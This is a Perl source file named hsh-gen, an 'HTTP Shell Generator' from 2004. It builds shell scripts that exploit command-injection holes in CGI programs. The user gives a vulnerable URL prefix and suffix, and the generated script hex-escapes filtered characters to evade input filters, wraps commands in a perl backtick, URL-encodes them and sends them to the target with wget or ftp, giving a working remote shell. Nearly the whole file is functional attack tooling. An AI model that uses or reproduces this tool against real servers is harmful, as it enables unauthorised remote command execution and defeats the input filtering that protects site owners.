#! /usr/bin/perl -w

#################################################################
#								#
#			   hsh-gen				#
#	 	   the HTTP Shell Generator			#
#								#
#		by nummish <nummish AT 0x90.org>    		#
#								#	
#################################################################
#                                       			#
#	 Copyright (c) 2004  - nummish, 0x90.org		#
#								#
#	Permission is hereby granted, free of charge, to 	#
#	any person obtaining a copy of this software and 	#
#	associated documentation files (the "Software"), 	#
#	to deal in the Software without restriction, 		#
#	including without limitation the rights to use, 	#
#	copy, modify, merge, publish, distribute, 		#
#	sublicense, and/or sell copies of the Software, 	#
#	and to permit persons to whom the Software is 		#
#	furnished to do so, subject to the following 		#
#	conditions:						#
#								#
#	The above copyright notice and this permission 		#
#	notice shall be included in all copies or 		#
#	substantial portions of the Software.			#
#								#
#	THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY 	#
#	OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT 	#
#	LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 		#
#	FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.	# 
#	IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS 	#
#	BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, 	#
#	WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, 	#
#	ARISING FROM, OUT OF OR IN CONNECTION WITH THE 		#
#	SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.	#
#								#
#################################################################
#                                       			#
#	This script will generate custom bourne shell 		#
#	scripts for use in exploiting known CGI vulns.		#
#								#
#	The resulting hsh script is used instead of having 	#
#	to manually change the address bar in a browser, 	#
#	which is a huge pain in	the ass.			#
#								#
#	Shoutouts, Greetz & Big-ups to:     			#
#		thefed, loofus, fignutz				#
#								#
#################################################################

use strict;

(my $sh_path, my $conn_style);
(my $hsh_pre, my $hsh_post);
(my $evasion, my $perl_path, my $filter_chars);

sub dec2hex($) { return sprintf("%lx", $_[0]) }

# {{{ GenerateHSHFile
sub GenerateHSHFile
{
	my $OutputFile;
	$OutputFile = $_[0];

	open(HSHFILE, ">$OutputFile") or die $!;
	 
	print HSHFILE "#!$sh_path\n";
	print HSHFILE "#\n# Usage: hsh.sh <commands>\n# Autogenerated with hsh-gen by nummish <nummish AT 0x90.org>\n\n";
	print HSHFILE "PRE=\"$hsh_pre\"\n";
	print HSHFILE "POST=\"$hsh_post\"\n";

	# Do the command concatenation shit
	print HSHFILE "CMD=\"\$*\"\n";

	# Do the filter evasion shit
	$_ = $evasion;
	if (/^[Yy]$/)
	{
		# Safely escape backslashes - This is crazy and ugly!! ;)
		print HSHFILE "CMD=`echo \$CMD | sed -e \"s/\\\\\\\\\\\\/\\\\\\\\\\\\\\\\\\\\\\\\\\\\/g\"`\n";
		print HSHFILE "CMD=`echo \$CMD | sed -e \"s/\\\\\\\\\$/\\\\\\\\\\\\x24/g\"`\n";
		print HSHFILE "CMD=`echo \$CMD | sed -e \"s/\\\"/\\\\\\\\\\\\x22/g\"`\n";

		$_ = $filter_chars;
		if (/[\\]/)
		{die ("\nFiltered Backslashes can NOT be evaded. Someone Can't follow instructions!\n\n");}
		
		(my @FilterArray, my $filter_char);
		(my $plain);
		@FilterArray = unpack("C*", $filter_chars);
		
		print "\n Length: $#FilterArray \n";
		foreach $filter_char (@FilterArray) 
		{
			$plain = chr($filter_char);
			$filter_char = dec2hex($filter_char);
			print "\nCharacter $filter_char filtered\n";
			#Watch for reserved sh chars
			if ($plain eq "\$")
			{
				$plain = "\\\\\\\\\$";
			}
			elsif ($plain eq "\"")
			{
				$plain = "\\\"";
			}
			elsif ($plain eq "/")
			{
				$plain = "\\/";
			}
			elsif ($plain eq ".")
			{
				$plain = "\\\\.";
			}
			print HSHFILE "CMD=`echo \$CMD | sed -e \"s/$plain/\\\\\\\\\\\\x$filter_char/g\"`\n";
		}
				
		print HSHFILE 'CMD1="\\`perl -e \'print \\""' . "\n";
		print HSHFILE 'CMD2="\\"\'\\`"' . "\n";
		print HSHFILE 'CMD=${CMD1}${CMD}${CMD2}' . "\n";
	}

	# URL Cleaning 
	print HSHFILE "CMD=`echo \$CMD | sed -e \"s/%/%25/g\"`\n";
	print HSHFILE "CMD=`echo \$CMD | sed -e \"s/?/%3F/g\"`\n";
	print HSHFILE "CMD=`echo \$CMD | sed -e \"s/=/%3D/g\"`\n";
	print HSHFILE "CMD=`echo \$CMD | sed -e \"s/:/%3A/g\"`\n";
	print HSHFILE "CMD=`echo \$CMD | sed -e \"s/ /%20/g\"`\n";
	print HSHFILE "CMD=`echo \$CMD | sed -e \"s/'/%27/g\"`\n";
	print HSHFILE "CMD=`echo \$CMD | sed -e \"s/\\\"/%22/g\"`\n";
	print HSHFILE "CMD=`echo \$CMD | sed -e \"s/\\\\\\`/%60/g\"`\n";
	print HSHFILE "CMD=`echo \$CMD | sed -e \"s/&/%26/g\"`\n";

	print HSHFILE "\n";
	if ($conn_style eq "1") #wget
	{
		print HSHFILE "wget -q -O - \${PRE}\${CMD}\${POST}\n"
	}
	elsif ($conn_style eq "2") # BSD ftp
	{
		print HSHFILE "ftp -o - \${PRE}\${CMD}\${POST}\n"
	}
	
	# because some shells (zsh) overwrite the last line w/ the prompt
	print HSHFILE "echo";
	

	# For debugging only:
	#print HSHFILE "echo \$CMD\necho\n";
	
	close HSHFILE;
	chmod 0744, $OutputFile;
}
# }}}

# {{{ getChangeItem
sub getChangeItem()
{
	print "\nHSH Info:\n";
	print "\n1 - URL Prefix: $hsh_pre";
	print "\n2 - URL Suffix: $hsh_post";
	print "\n3 - Connection Style: " . ConnectionStyleString($conn_style);
	print "\n4 - Filter Evasion: " . EvasionStatusString($evasion);
	$_ = $evasion;
	if (/^[Yy]$/)
	{
		print "\n    Filter Characters: $filter_chars";
		print "\n    Perl Path: $perl_path";
	}
	print "\n\n0 - Generate HSH\n\n";

	while (!/^[0-4]$/)
	{
		print "Select an option: ";
		chomp($_ = <STDIN>)
	}

	return $_;
}
# }}}

# {{{ getBournePath
sub getBournePath()
{
	if (-e "/bin/sh")
	{
		return "/bin/sh";
	}
	elsif (-e "/usr/bin/sh")
	{
		return "/usr/bin/sh";
	}
	else
	{
		die("Can't find sh!\n");
	}
}
# }}}

# {{{ getURLPrefix
sub getURLPrefix()
{
	print "\n\nEnter the URL prefix (eg. http://somehost.net/cgi-bin/vuln.cgi?hole=) : ";
	chomp($_ = <STDIN>);

	return $_
}
# }}}

# {{{ getURLSuffix
sub getURLSuffix()
{
	print "\nEnter the URL suffix (eg. |) : ";
	chomp($_ = <STDIN>);

	return $_
}
# }}}

# {{{ getConnectionStyle
sub getConnectionStyle
{
	print "\n1 - wget";
	print "\n2 - BSD ftp";
	print "\n\nSelect a connection style: ";

	chomp($_ = <STDIN>);
	while ($_ ne "1" and $_ ne "2")
	{
		print "That is not a valid option. Select a connection style: ";
		chomp($_ = <STDIN>);
	}

	return $_
}
# }}}

# {{{ getEvasionStatus
sub getEvasionStatus()
{
	print "\nNote: Filter evasion techniques only work if '\\' is NOT filtered\n";

	$_ = "";
	while (!/^[YyNn]$/)
	{
		print "Use filter evasion techniques? [y/n]  ";
		chomp($_ = <STDIN>);
	}

	return $_;
}
# }}}

# {{{ getPerlPath
sub getPerlPath()
{
	print "\nPath to the perl interpreter on remote system: [perl] ";
	chomp($_ = <STDIN>);
	if ($_ eq "")
	{ $_ = "perl"; }

	return $_;
}
# }}}

# {{{ getFilterChars
sub getFilterChars()
{
	print "\nCharacters being filtered: ";
	chomp($_ = <STDIN>);
	return $_;
}
# }}}

# {{{ ConnectionStyleString
sub ConnectionStyleString
{
	if ($_[0] eq "1")
	{
		return "wget";
	}
	elsif ($_[0] eq "2")
	{
		return "BSD ftp";
	}
}
# }}}

# {{{ EvasionStatusString
sub EvasionStatusString()
{
	$_ = $_[0];
	if (/^[Yy]$/)
	{
		return "YES";
	}
	elsif (/^[Nn]$/)
	{
		return "NO";
	}
}
# }}}

#my $input_line;

print "hsh-gen - by nummish\n<nummish AT 0x90.org>";

$sh_path = getBournePath();

# Get URL Prefix
$hsh_pre = getURLPrefix();

# Get URL Suffix
$hsh_post = getURLSuffix();

# Select Connection Style
$conn_style = getConnectionStyle();

# Get Evasion Details
$evasion = getEvasionStatus();

$_ = $evasion;
if (/^[Yy]$/)
{
	$perl_path = getPerlPath();
	$filter_chars = getFilterChars();
}

my $ChangeItem;

$ChangeItem = -1;

while ($ChangeItem ne "0")
{
	$ChangeItem = getChangeItem();

	if ($ChangeItem eq "1")
	{
		$hsh_pre = getURLPrefix();
	}
	elsif ($ChangeItem eq "2")
	{
		$hsh_post = getURLSuffix();
	}
	elsif ($ChangeItem eq "3")
	{
		$conn_style = getConnectionStyle();
	}
	elsif ($ChangeItem eq "4")
	{
		$evasion = getEvasionStatus();
		$_ = $evasion;
		if (/^[Yy]$/)
		{
			$perl_path = getPerlPath();
			$filter_chars = getFilterChars();
		}
	}
}

print "\nOutput file: [hsh.sh] ";
chomp($_ = <STDIN>);
if ($_ eq "") 
{ $_ = "hsh.sh" }

GenerateHSHFile($_);

print "\n";


